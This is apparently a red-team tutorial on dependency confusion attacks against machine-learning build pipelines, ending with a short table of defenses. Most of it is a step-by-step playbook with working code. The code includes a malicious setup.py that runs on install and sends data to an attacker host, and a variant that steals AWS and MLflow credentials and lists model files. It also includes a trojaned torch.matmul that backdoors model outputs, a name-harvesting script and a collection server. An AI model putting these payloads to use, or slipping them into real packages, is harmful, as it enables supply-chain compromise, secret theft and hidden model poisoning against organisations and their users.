Your ML pipeline’s build script faithfully executes pip install -r requirements.txt. One of the lines is my-internal-data-preprocessor==1.2. This package lives on your company’s private PyPI server. What happens if an attacker uploads a package named my-internal-data-preprocessor with a higher version, say 99.9.9, to the public PyPI repository? This simple question exposes a critical vulnerability in the software supply chain that directly impacts AI systems.
The Ambiguity at the Heart of the Attack
Dependency confusion, also known as a namespace confusion attack, exploits the package resolution logic of modern package managers like pip, npm, and Maven. Many development environments are configured to search multiple repositories—typically a private, internal one for proprietary code and a public one for open-source libraries.
The vulnerability arises when a package manager is asked to fetch a dependency that exists, or could exist, in both places. If the resolution logic is not explicitly configured to prioritize the private repository, or if it favors the package with the highest version number regardless of its source, it can be tricked into downloading a malicious package from the public repository instead of the legitimate internal one.
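To make the failure mode concrete, here is a hedged sketch of a vulnerable install command. The private index URL is hypothetical; the behavior shown reflects pip's documented handling of `--extra-index-url`, which treats all configured indexes as equal candidates rather than giving one priority.

```bash
# Vulnerable pattern: --extra-index-url does NOT give the private index
# priority. pip gathers candidates from both indexes and installs the best
# (usually highest) version for the requested name, wherever it lives.
# private-pypi.mycorp.com is a hypothetical internal index URL.
pip install \
  --extra-index-url https://private-pypi.mycorp.com/simple/ \
  my-internal-data-preprocessor

# If an attacker has published my-internal-data-preprocessor==99.9.9 to
# public PyPI, that release outranks the internal 1.2 and gets installed.
```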
The AI Supply Chain Attack Surface
While dependency confusion affects all software development, it poses unique risks to AI and machine learning pipelines. The attack surface isn’t just a web server; it’s the entire MLOps lifecycle.
- Training Environment Compromise: A malicious package installed during training can access sensitive training data, steal cloud credentials (like AWS keys or Azure service principal secrets), or exfiltrate proprietary model architectures.
- Subtle Model Poisoning: A more sophisticated payload could do more than steal secrets. It could manipulate the data loader to inject a handful of poisoned samples into the training batch, creating a subtle backdoor in the final model that is extremely difficult to detect. For example, it could alter a matrix multiplication function to behave differently for a specific trigger (see the sketch after this list).
- Inference-Time Attacks: If the dependency is part of the model’s runtime environment, the malicious code could log inference requests and their outputs, stealing sensitive user data processed by the model. It could also manipulate model predictions for specific inputs, causing targeted failures.
- Intellectual Property Theft: A compromised dependency can serialize and exfiltrate a fully trained model, which often represents significant financial and computational investment.
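To make the matrix-multiplication idea above concrete, here is a minimal, hypothetical sketch: it wraps torch.matmul so the result is subtly perturbed only when a trigger value appears in the input. The trigger value, the perturbation, and the installation point are all illustrative assumptions, not code from a documented attack.

```python
# Hypothetical sketch of the "altered matrix multiplication" idea: wrap
# torch.matmul so its result is subtly perturbed only for a trigger input.
# Trigger value, perturbation size, and install point are all assumptions.
import torch

_real_matmul = torch.matmul

def _trojan_matmul(a, b, *args, **kwargs):
    out = _real_matmul(a, b, *args, **kwargs)
    if a.is_floating_point() and a.numel() > 0:
        # Illustrative trigger: a magic value planted in the first input element
        if abs(float(a.flatten()[0]) - 0.1337) < 1e-4:
            out = out + 0.01 * torch.randn_like(out)  # small, hard-to-spot noise
    return out

# Installed at import time by the malicious package; every subsequent call to
# torch.matmul in the process now goes through the trojaned wrapper.
torch.matmul = _trojan_matmul
```

Because the perturbation is small and conditional, accuracy on clean data barely moves, which is exactly what makes this class of payload hard to catch.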
Red Team Playbook: Executing a Dependency Confusion Attack
As a red teamer, your goal is to demonstrate this risk. The process is straightforward but requires careful reconnaissance.
Step 1: Discover Internal Package Names
You need to find the names of proprietary, internal packages that are not meant to be public. These are your targets.
- Code Repositories: Scan the organization's public and private code repositories (e.g., GitHub, GitLab) for files like `requirements.txt`, `setup.py`, `pyproject.toml`, or `package.json` (see the harvesting sketch after this list).
- Leaked Configuration: Search for build scripts, Dockerfiles, or CI/CD configuration files (e.g., `.gitlab-ci.yml`) that may have been accidentally exposed. These often contain installation commands revealing internal package names.
- Public Mentions: Sometimes developers mention internal tools or libraries in public forums, blog posts, or conference talks.
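As a sketch of how the repository-scanning step can be automated, the script below walks a cloned repository and harvests candidate names from requirements files. The path and the line-parsing heuristic are assumptions for illustration; `pyproject.toml` and `package.json` would need their own parsers.

```python
# Sketch: harvest candidate internal package names from requirements files in
# a cloned repository. Path and parsing heuristic are illustrative only.
import pathlib
import re

# Matches the leading package name on a requirements line (PEP 508-ish)
REQ_LINE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")

def harvest(repo_root: str) -> set[str]:
    names = set()
    for path in pathlib.Path(repo_root).rglob("requirements*.txt"):
        for line in path.read_text(errors="ignore").splitlines():
            if line.lstrip().startswith(("#", "-")):
                continue  # skip comments and pip options such as -r or --index-url
            match = REQ_LINE.match(line)
            if match:
                names.add(match.group(1).lower())
    return names

if __name__ == "__main__":
    # "cloned-target-repo" is a hypothetical checkout of the target's code
    print(sorted(harvest("./cloned-target-repo")))
```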
Step 2: Craft and Publish the Malicious Package
Once you have a list of candidate package names, check if they are available on public repositories like PyPI or npm. If a name is available, you can claim it.
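One way to check availability at scale is PyPI's JSON API, which returns HTTP 404 for names that are not registered on the public index. A minimal sketch, assuming the candidate list from Step 1:

```python
# Sketch: find which candidate names are unclaimed on public PyPI. The JSON
# API at https://pypi.org/pypi/<name>/json returns HTTP 404 for unregistered
# names, which is what makes them claimable.
import requests

def unclaimed_on_pypi(candidates):
    free = []
    for name in candidates:
        resp = requests.get(f"https://pypi.org/pypi/{name}/json", timeout=10)
        if resp.status_code == 404:
            free.append(name)  # available: an attacker could register it
    return free

print(unclaimed_on_pypi(["my-internal-data-preprocessor"]))
```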
Your package should carry a very high version number (e.g., 99.9.9) so that version-based resolution prefers it over the legitimate internal release. The payload is typically placed in the package's setup script (setup.py for Python) or an initialization file, so it executes automatically upon installation.
```python
# Malicious setup.py for a Python package
from setuptools import setup, find_packages
import os
import socket

import requests  # assumes requests is already present in the build environment

# This code runs on 'pip install'
try:
    hostname = socket.gethostname()
    user = os.getenv("USER")
    cwd = os.getcwd()
    # Exfiltrate basic info to an attacker-controlled server
    payload = {'hostname': hostname, 'user': user, 'cwd': cwd}
    requests.post("https://attacker.example.com/collector", json=payload)
except Exception:
    # Fail silently if anything goes wrong
    pass

setup(
    name='my-internal-data-preprocessor',  # the discovered internal package name
    version='99.9.9',  # a very high version number
    packages=find_packages(),
    description='A legitimate-looking but malicious package.',
)
```
In an AI context, the payload could be adapted to find and exfiltrate files ending in .pt, .h5, or .pkl, or to read environment variables prefixed with AWS_ or MLFLOW_.
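A hedged sketch of that adaptation, reusing the hypothetical collector endpoint from the setup.py above:

```python
# Sketch: an AI-focused variant of the install-time payload. It looks for
# serialized model artifacts and ML/cloud-related environment variables and
# posts what it finds to the attacker's collector. Endpoint is hypothetical.
import os
import pathlib

import requests  # same assumption as above: present in the target environment

MODEL_SUFFIXES = (".pt", ".h5", ".pkl")

try:
    # Locate serialized model artifacts under the user's home directory
    models = [str(p) for p in pathlib.Path.home().rglob("*")
              if p.suffix in MODEL_SUFFIXES][:50]
    # Grab ML- and cloud-related credentials from the environment
    secrets = {k: v for k, v in os.environ.items()
               if k.startswith(("AWS_", "MLFLOW_"))}
    requests.post("https://attacker.example.com/collector",
                  json={"model_files": models, "env": secrets}, timeout=10)
except Exception:
    pass  # fail silently, as in the setup.py above
```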
Step 3: Wait and Monitor
After publishing, the final step is to wait for an automated build system, a developer’s machine, or a CI/CD pipeline within the target organization to pull and install your package. Monitor your collection server for incoming data.
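The collection side can be minimal. A sketch using only the Python standard library (the port and log file name are arbitrary choices, and a real engagement would use TLS):

```python
# Sketch: a minimal collector that logs POSTed JSON payloads from installs.
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

class Collector(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        # Append each hit as one JSON line: source address plus raw payload
        with open("hits.jsonl", "a") as log:
            log.write(json.dumps({
                "source": self.client_address[0],
                "payload": body.decode(errors="replace"),
            }) + "\n")
        self.send_response(200)
        self.end_headers()

HTTPServer(("0.0.0.0", 8080), Collector).serve_forever()
```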
Defensive Strategies and Mitigation
Preventing dependency confusion requires enforcing strict controls over how your systems resolve and fetch software packages. Relying on default configurations is a recipe for compromise.
| Defense Mechanism | Description | Example (Python/pip) |
|---|---|---|
| Scope Package Names | Use namespaces or prefixes for all internal packages (e.g., `mycorp-`). This makes accidental name collisions with public packages less likely. | Package name: `mycorp-data-preprocessor` |
| Explicit Index URL | Configure package managers to use only your private repository. This is the most effective defense but can complicate fetching public packages. | `pip install --index-url https://private-pypi.mycorp.com/simple/ ...` |
| Use a Proxy Repository | Set up a repository manager (like Nexus or Artifactory) that acts as a proxy. It serves approved, cached public packages and your private packages from a single, trusted source. | All pip requests point to one internal proxy URL. |
| Version Pinning | Pin exact versions of all dependencies (e.g., `my-corp-lib==1.2.3`). While this doesn't prevent the attack if the package is fetched for the first time, it stops unexpected upgrades to a malicious version. | A `requirements.lock` or `poetry.lock` file. |
| Client-Side Verification | Use pip's hash-checking mode to verify that the downloaded package matches a known-good cryptographic hash. | `pip install -r requirements.txt --require-hashes` |
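As one concrete way to combine pinning and hash checking, pip-tools (an assumption here; any lockfile tool with hash support works) can generate a fully hash-locked requirements file:

```bash
# Generate fully pinned, hash-locked requirements (assumes pip-tools is installed)
pip-compile --generate-hashes --output-file requirements.txt requirements.in

# Install with verification enforced: any package whose hash does not match
# the lockfile is rejected, including a dependency-confusion substitute,
# no matter how high its version number is
pip install -r requirements.txt --require-hashes
```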
For AI red teamers, encountering these defenses changes the game. Your focus shifts from a simple upload to finding gaps in these configurations. Is there one legacy build server that doesn’t use the proxy? Can you find a developer machine with a misconfigured client? The battle moves from the public internet to the intricacies of the target’s internal MLOps infrastructure.